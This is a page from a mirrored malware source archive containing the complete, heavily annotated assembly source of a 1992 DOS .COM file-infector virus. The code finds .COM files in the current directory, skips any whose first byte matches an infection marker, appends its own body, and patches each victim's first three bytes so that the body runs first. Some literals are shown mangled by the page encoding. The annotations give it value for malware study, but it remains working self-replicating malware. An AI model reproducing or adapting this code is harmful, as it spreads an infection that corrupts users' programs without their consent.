mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
|
; Analyst summary: 16-bit DOS .COM file-infector sample (TASM/MASM syntax, tiny model).
|
|||
|
; The carrier program at 'start' opens with a JMP into the body that begins at 'virusstart'.
|
|||
|
; NOTE(review): the original header comments are mis-encoded on this page and cannot be recovered; these lines describe only what the code below shows.
|
|||
|
;
|
|||
|
; Copyright (c) 1992, Gogi&Givi International.
|
|||
|
;
|
|||
|
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
org 0100h
|
|||
|
start:
|
|||
|
jmp virusstart ; first instruction at 0100h: hands control to the body before any host code runs
|
|||
|
mov ah,09h ; DOS fn 09h (print '$'-terminated string at DS:DX); DX is set by the 3 bytes stored at 'original', which the body copies back over 0100h
|
|||
|
int 21h ; DOS service call
|
|||
|
|
|||
|
mov ax,4C00h ; DOS fn 4Ch, AL=00h: terminate the program
|
|||
|
|
|||
|
int 21h
|
|||
|
|
|||
|
Message db 'This is little infection... He-he...',13,10,'$'
|
|||
|
; The string above is what the carrier prints once control returns to 0100h.
|
|||
|
|
|||
|
; It is referenced by 'mov dx,offset Message' at label 'original'.
|
|||
|
|
|||
|
virusstart: ; entry of the appended body: save state, restore the host's first 3 bytes, start the file search
|
|||
|
pushf
|
|||
|
|||
|
|
push ax ; flags and registers are saved here and popped in reverse order at OutVirus
|
|||
|
|
push bx ; (saved)
|
|||
|
|
push cx
|
|||
|
|
push dx
|
|||
|
|
push ds ; segment registers are saved too, because DS and ES are reloaded from CS below
|
|||
|
|
push es ; (saved)
|
|||
|
|
push si
|
|||
|
|
call SelfPoint
|
|||
|
|
SelfPoint: ; the CALL pushes this label's run-time address
|
|||
|
|
pop si ; SI = run-time address of SelfPoint; every later data reference is SI plus an assemble-time label difference
|
|||
|
|
|
|||
|
cld ; string operations move forward
|
|||
|
|
push cs ; DS = CS
|
|||
|
|
pop ds ; (completes DS = CS)
|
|||
|
|
push cs ; ES = CS
|
|||
|
|
pop es
|
|||
|
|
mov di,0100h ; destination: start of the program image
|
|||
|
|
push si ; keep the SelfPoint address across the copy
|
|||
|
|
add si,original-SelfPoint ; source: the 3 saved bytes at label 'original'
|
|||
|
|
mov cx,3 ; three bytes, the size of the JMP placed at 0100h
|
|||
|
|
rep movsb ; overwrite the JMP at 0100h in memory with the saved bytes
|
|||
|
|
pop si ; SI = SelfPoint address again
|
|||
|
|
|
|||
|
mov ah,1Ah ; DOS fn 1Ah: set the Disk Transfer Area to DS:DX
|
|||
|
|
mov dx,si ; DX = SelfPoint address
|
|||
|
|
add dx,VirusDTA-SelfPoint ; DX = run-time address of the VirusDTA buffer inside the body
|
|||
|
|
int 21h
|
|||
|
|
|
|||
|
mov ah,4Eh ; DOS fn 4Eh: FindFirst
|
|||
|
|
mov dx,si ; DX = SelfPoint address
|
|||
|
|
add dx,FileMask-SelfPoint ; DX = run-time address of the '*.cOm' mask (no path component in the mask)
|
|||
|
|
mov cx,32 ; attribute mask 20h (archive bit)
|
|||
|
|
int 21h ; result is written to the DTA set above; CF=1 when nothing matches
|
|||
|
|
; Analyst note: the CALL/POP address idiom and the literal mask string are static traits of this sample.
|
|||
|
|
jnc RepeatOpen ; a match was found: go on to open it
|
|||
|
|
|
|||
|
jmp OutVirus ; no match or error: restore state and run the host
|
|||
|
|
|||
|
RepeatOpen:
|
|||
|
|
mov ax,3D02h ; DOS fn 3Dh, AL=02h: open the found file for read/write
|
|||
|
|
mov dx,si ; DX = SelfPoint address
|
|||
|
|
add dx,NameF-SelfPoint ; DX = NameF, the 13 bytes that directly follow the 30-byte VirusDTA (the file-name field of the find record)
|
|||
|
|
int 21h
|
|||
|
|
jc OutVirus ; open failed: give up and run the host
|
|||
|
|
|
|||
|
mov bx,ax ; BX = file handle
|
|||
|
|
; BX carries the handle for every file call below
|
|||
|
|
|
|||
|
mov ah,3Fh ; DOS fn 3Fh: read from the file
|
|||
|
|
mov dx,si ; DX = SelfPoint address
|
|||
|
|
add dx,Original-SelfPoint ; buffer = 'original', so the target's own first bytes replace the saved ones
|
|||
|
|
mov cx,3 ; read 3 bytes
|
|||
|
|
int 21h
|
|||
|
|
jc OutVirus ; read failed: give up
|
|||
|
|
push bx
|
|||
|
|
mov bx,dx
|
|||
|
|
cmp byte ptr [bx],'<27>' ; compare the file's first byte with the marker byte; NOTE(review): the literal is mangled by the page encoding, presumably the one-byte near-JMP opcode written at the 'mov byte ptr [bx]' below (confirm against the original bytes)
|
|||
|
|
pop bx ; restore the handle; POP leaves the compare flags intact
|
|||
|
|
;
|
|||
|
|
je CloseNotInfect ; first byte already equals the marker: skip this file
|
|||
|
|
; Analyst note: this check looks at one byte only, so any file that
|
|||
|
|
; already starts with that byte is skipped and left unmodified.
|
|||
|
|
|
|||
|
mov ax,4202h ; DOS fn 42h, AL=02h: seek relative to end of file
|
|||
|
|
xor cx,cx ; offset CX:DX = 0
|
|||
|
|
xor dx,dx
|
|||
|
|
int 21h ; returns the new position (the file length) in DX:AX
|
|||
|
|
jc OutVirus ; seek failed: give up
|
|||
|
|
; only AX, the low word of the length,
|
|||
|
|
; is kept for the jump calculation below
|
|||
|
|
push ax
|
|||
|
|
|
|||
|
mov ah,40h ; DOS fn 40h: write to the file at the current position (end of file)
|
|||
|
|
mov dx,si ; DX = SelfPoint address
|
|||
|
|
sub dx,SelfPoint-VirusStart ; DX = run-time address of virusstart
|
|||
|
|
mov cx,VirusEnd-VirusStart ; length of the body; the file grows by exactly this many bytes
|
|||
|
|
int 21h
|
|||
|
|
|
|||
|
pop ax
|
|||
|
|
jc OutVirus ; tests CF from the write (POP does not change flags)
|
|||
|
|
; write failed: give up
|
|||
|
|
|
|||
|
sub ax,3 ; original length minus the 3-byte jump = displacement from offset 3 to the old end of file
|
|||
|
|
push bx ; keep the handle while BX is used as a pointer
|
|||
|
|
mov bx,si
|
|||
|
|
sub bx,SelfPoint-VirusStart
|
|||
|
|
mov word ptr cs:[bx+1],ax ; store the displacement at virusstart+1 in the running copy (those bytes have already executed)
|
|||
|
|
mov byte ptr [bx],'<27>' ; store the marker byte at virusstart; NOTE(review): same mangled literal as in the compare above
|
|||
|
|
; (no segment override here; DS was set equal to CS at entry)
|
|||
|
|
pop bx
|
|||
|
|
|
|||
|
mov ax,4200h ; DOS fn 42h, AL=00h: seek relative to start of file
|
|||
|
|
xor cx,cx ; offset CX:DX = 0
|
|||
|
|
xor dx,dx
|
|||
|
|
int 21h
|
|||
|
|
jc OutVirus ; seek failed: give up
|
|||
|
|
|
|||
|
mov ah,40h ; DOS fn 40h: write
|
|||
|
|
mov dx,si ; DX = SelfPoint address
|
|||
|
|
sub dx,SelfPoint-VirusStart ; source = the 3 bytes just built at virusstart
|
|||
|
|
mov cx,3 ; overwrite the file's first 3 bytes with marker + displacement
|
|||
|
|
int 21h
|
|||
|
|
jc OutVirus ; write failed: give up
|
|||
|
|
|
|||
|
mov ah,3Eh ; DOS fn 3Eh: close the handle in BX
|
|||
|
|
int 21h ; one file is modified per run;
|
|||
|
|
jmp OutVirus ; the search does not continue after a successful write
|
|||
|
|
|||
|
CloseNotInfect:
|
|||
|
|
mov ah,3Eh ; DOS fn 3Eh: close the skipped file
|
|||
|
|
int 21h ; handle is in BX
|
|||
|
|
|
|||
|
mov dx,si
|
|||
|
|
add dx,FileMask-SelfPoint ; DX = mask address; FindNext itself continues from the DTA set at entry
|
|||
|
|
mov ah,4Fh
|
|||
|
|
int 21h
|
|||
|
|
jc OutVirus ; no further match: restore state and run the host
|
|||
|
|
jmp RepeatOpen ; next match: its name is now in NameF, try to open it
|
|||
|
|
|||
|
OutVirus:
|
|||
|
|
pop si ; common exit: pops mirror the pushes at virusstart,
|
|||
|
|
pop es ; in reverse order,
|
|||
|
|
pop ds ; ending with the flags
|
|||
|
|
pop dx
|
|||
|
|
pop cx
|
|||
|
|
pop bx
|
|||
|
|
pop ax
|
|||
|
|
popf
|
|||
|
|
mov si,0100h ; SI = start of the program image (the SI value restored above is overwritten)
|
|||
|
|
push si ; push 0100h as a return address
|
|||
|
|
ret ; near RET pops it: execution continues at 0100h, where the host's first 3 bytes were restored
|
|||
|
|
|||
|
; Data carried inside the body (all of it lies between VirusStart and VirusEnd, so it is written to the target file):
|
|||
|
|
|||
|
|
VirusDTA db 30 dup (0) ; first 30 bytes of the Disk Transfer Area set with fn 1Ah
|
|||
|
|
NameF db 13 dup (0) ; next 13 bytes of the same area; used as the ASCIIZ name passed to the open call
|
|||
|
|
FileMask db '*.cOm',(0) ; ASCIIZ search mask for FindFirst
|
|||
|
|
; Analyst note: the mixed-case mask literal is a fixed string in every copy of this body.
|
|||
|
|
original:
|
|||
|
|
mov dx,offset Message ; 3-byte slot holding the host's original first bytes; in this carrier they are the host's real first instruction
|
|||
|
|
VirusEnd: ; end marker: VirusEnd-VirusStart is the number of bytes appended to a file
|
|||
|
|
; (the 3-byte slot at 'original' is inside that range)
|
|||
|
|
end start
|